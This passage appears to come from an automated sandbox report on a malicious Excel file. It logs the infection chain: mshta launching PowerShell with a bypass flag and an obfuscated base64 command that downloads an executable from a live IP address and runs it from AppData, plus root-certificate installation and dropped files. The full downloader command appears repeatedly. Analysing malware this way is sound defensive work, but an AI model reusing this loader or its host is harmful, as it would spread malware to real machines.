gICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"Jump to behavior
            Suspicious powershell command line found
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,25_2_0041CB50
            Source: csrss[1].exe.7.drStatic PE information: section name: .managed
            Source: csrss[1].exe.7.drStatic PE information: section name: hydrated
            Source: winiti.exe.7.drStatic PE information: section name: .managed
            Source: winiti.exe.7.drStatic PE information: section name: hydrated
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899F022D push eax; iretd 7_2_000007FE899F0241
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899F00BD pushad ; iretd 7_2_000007FE899F00C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00457106 push ecx; ret 25_2_00457119
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0045B11A push esp; ret 25_2_0045B141
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0045E54D push esi; ret 25_2_0045E556
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00457A28 push eax; ret 25_2_00457A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00434E56 push ecx; ret 25_2_00434E69

            Persistence and Installation Behavior

            barindex
            AI detected suspicious Excel or Word document
            Source: Office documentLLM: Score: 9 Reasons: The screenshot contains a visually prominent Microsoft Office logo and text stating 'This document is protected,' which can mislead users into thinking it is a legitimate document. The instructions provided create a sense of urgency by stating 'Open the document in Microsoft Office' and 'If this document was downloaded from your email, please click Enable Editing from the yellow bar above.' This language is designed to prompt immediate action. The use of a well-known brand (Microsoft Office) adds to the credibility of the document, increasing the likelihood of users following the instructions without suspicion. The sense of urgency is directly connected to the prominent instructions, making it highly likely that the document is designed to deceive users into enabling potentially harmful content.
            Installs new ROOT certificates
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00406EB0 ShellExecuteW,URLDownloadToFileW,25_2_00406EB0
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,25_2_0041AA4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,25_2_0041CB50
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
